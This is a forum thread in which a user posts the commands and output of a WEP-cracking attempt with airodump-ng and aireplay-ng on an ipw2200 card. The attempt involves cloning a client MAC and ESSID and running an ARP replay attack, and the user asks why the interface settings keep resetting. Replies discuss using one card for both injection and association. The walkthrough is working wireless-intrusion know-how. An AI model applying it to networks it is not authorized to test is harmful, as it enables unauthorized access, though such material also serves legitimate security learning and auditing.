
Thread: aireplay-ng resets my MAC and ESSID.. help

  1. #1
    scottsee
    Guest

    aireplay-ng resets my MAC and ESSID.. help

    Every time I run the aireplay-ng attack it is resetting my ESSID to the first open-key network in my area and not allowing me to further the attack. Here's what's going on.

    Scanning my network to locate my BSSID using WEP on channel 11

    bt ~ # airodump-ng eth1 -t wep -c 11
    Shows the NETGEAR target AP

    CH 11 ][ Elapsed: 2 mins ][ 2009-01-02 13:36

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:90:4C:7E:00:29 191 29 224 0 0 11 54 WEP WEP NETGEAR

    BSSID STATION PWR Rate Lost Packets Probes

    00:90:4C:7E:00:29 00:C0:A8:BD:28:29 193 1- 1 0 6
    Setting up my ipw2200 to allow this attack.

    bt ~ # rmmod ipw2200
    bt ~ # modprobe ipw2200 rtap_iface=1 channel=11
    bt ~ # ifconfig eth1 down
    bt ~ # iwconfig eth1 ap 00:90:4C:7E:00:29
    bt ~ # iwconfig eth1 essid NETGEAR
    bt ~ # iwconfig eth1 key s:fakekey
    bt ~ # iwconfig eth1 mode managed
    bt ~ # ifconfig eth1 up
    Checking that my settings took

    bt ~ # iwconfig eth1

    eth1 unassociated ESSID:"NETGEAR"
    Mode:Managed Frequency=2.462 GHz Access Point: 00:90:4C:7E:00:29
    Bit Rate:0 kb/s Tx-Power=20 dBm Sensitivity=8/0
    Retry limit:7 RTS thr:off Fragment thr:off
    Encryption key:6661-6B65-6B65-7900-0000-0000-00 Security mode:open
    Power Management:off
    Link Quality:0 Signal level:0 Noise level:0
    Rx invalid nwid:0 Rx invalid crypt:9 Rx invalid frag:0
    Tx excessive retries:0 Invalid misc:5168 Missed beacon:0
    Now that I've configured my MAC and eth1 device to clone that of my target Access Point, I bring up my eth1 and rtap0 and run airodump-ng again, this time writing IVs to a dump file named crack.

    bt ~ # ifconfig eth1 up
    bt ~ # ifconfig rtap0 up
    bt ~ #
    bt ~ # airodump-ng -c 11 --bssid 00:90:4C:7E:00:29 --ivs -w crack rtap0
    Shows the output of airodump-ng saving only the wanted packets

    CH 11 ][ Elapsed: 4 mins ][ 2009-01-02 13:27

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:90:4C:7E:00:29 186 42 765 6 0 11 54 WEP WEP NETGEAR

    BSSID STATION PWR Rate Lost Packets Probes

    00:90:4C:7E:00:29 00:C0:A8:BD:28:29 199 1- 1 0 6
    This is where everything starts to fall apart. I start the aireplay-ng attack, and every time I try it just resets everything.

    Code:
     aireplay-ng --arpreplay -b 00:90:4C:7E:00:29 -h 00:C0:A8:BD:28:29 -i rtap0 eth1
    The interface MAC (00:16:6F:44:F2:35) doesn't match the specified MAC (-h).
    ifconfig eth1 hw ether 00:C0:A8:BD:28:29
    13:34:03 Waiting for beacon frame (BSSID: 00:90:4C:7E:00:29) on channel 11
    Saving ARP requests in replay_arp-0102-133405.cap
    You should also start airodump-ng to capture replies.
    Read 1232 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
    As you can see the eth1 interface MAC resets from the cloned station, causing no ARP packets to come through and my MAC address to default back to my original MAC. At this point I stop the attack and check ifconfig eth1 and iwconfig eth1 and everything has reset. I don't

    bt ~ # ifconfig eth1
    eth1 Link encap:Ethernet HWaddr 00:16:6F:44:F2:35
    UP BROADCAST RUNNING MTU:1500 Metric:1
    RX packets:2108 errors:17 dropped:5185 overruns:0 frame:0
    TX packets:1 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:3286812 (3.1 MiB) TX bytes:0 (0.0 b)
    Interrupt:17 Base address:0x6000 Memory:dfbfd000-dfbfdfff
    bt ~ # iwconfig eth1
    eth1 IEEE 802.11g ESSID:"Wireless1"
    Mode:Managed Frequency:2.462 GHz Access Point: 00:14:6C:7F:1E:86
    Bit Rate:54 Mb/s Tx-Power=20 dBm Sensitivity=8/0
    Retry limit:7 RTS thr:off Fragment thr:off
    Encryption key:6661-6B65-6B65-7900-0000-0000-00 Security mode:open
    Power Management:off
    Link Quality=70/100 Signal level=-56 dBm Noise level=-83 dBm
    Rx invalid nwid:0 Rx invalid crypt:14 Rx invalid frag:0
    Tx excessive retries:0 Invalid misc:5168 Missed beacon:7
    I've pretty well scoured and sifted through countless posts/threads/howtos. I've read the "cracking wep with ipw2200 (v1) and (v2)" on the aircrack-ng forums, the ipw2200 wiki, and the ipw2200 FAQ on remote-exploit. I understand the MAC error and why it's happening, but everything I've been finding doesn't seem to explain the fix. I'm wondering if it has to do with the network management software. Like Ubuntu's NetworkManager, is there a daemon that needs to be killed to prevent this from happening? Any help will be SO welcome.

    Scott

  2. #2
    Senior Member


    I only skimmed through your post but it seems like you are trying to use the same interface to both connect to the AP in managed mode and to perform the actual attack in monitor mode. Naturally this will be unsuccessful which is why you see all the ifconfig/iwconfig settings being reset.

    You will need to use an additional device to play the role of the client as the same card cannot do both actions at once.
    -Monkeys are like nature's humans.

  3. #3
    scottsee
    Guest


    I thought I was using the rtap0 interface from the patched ipw2200 driver by executing the command

    modprobe ipw2200 rtap_iface=1

    and then using the (-i rtap0 eth1) arguments at the end of the aireplay-ng command to listen on rtap0 but inject on eth1. Am I doing this wrong?
